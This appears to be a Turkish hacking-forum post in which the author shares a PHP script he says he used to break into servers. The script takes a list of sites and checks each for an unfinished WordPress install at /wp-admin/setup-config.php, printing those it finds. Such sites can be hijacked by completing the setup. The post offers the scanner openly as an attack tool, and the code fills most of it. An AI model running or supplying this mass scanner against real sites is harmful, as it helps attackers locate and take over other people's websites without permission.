Uzun zaman önce sunuculara sızmak için kodladığım bir exploittir. Pek çok defa işime yaradı. Sizlerle de paylaşayım dedim. Bol hackler 
Kullanim:
php wpinstall.php sitelistesi.txt
Kullanim:
php wpinstall.php sitelistesi.txt



PHP:
<?php
echo "\r\n";
echo '## Coded By Nihilist';
echo "\r\n";
echo '## Ajanlar.ORG';
echo "\r\n";
echo "\r\n";
set_time_limit(0);
error_reporting(0);
if (isset($argv[1]))
{
$oku = file_get_contents($argv[1]);
$ayir = split("\r\n",$oku);
foreach($ayir as $siteler)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteler."/wp-admin/setup-config.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
$icerik = curl_exec($ch);
curl_close($ch);
if (strstr($icerik,'setup-config.php?step=1'))
{
echo $siteler." --> Var :)\r\n";
}
else
{
}
}
}
else{
echo 'Ornek: php wpinstall.php sitelistesi.txt';
}
?>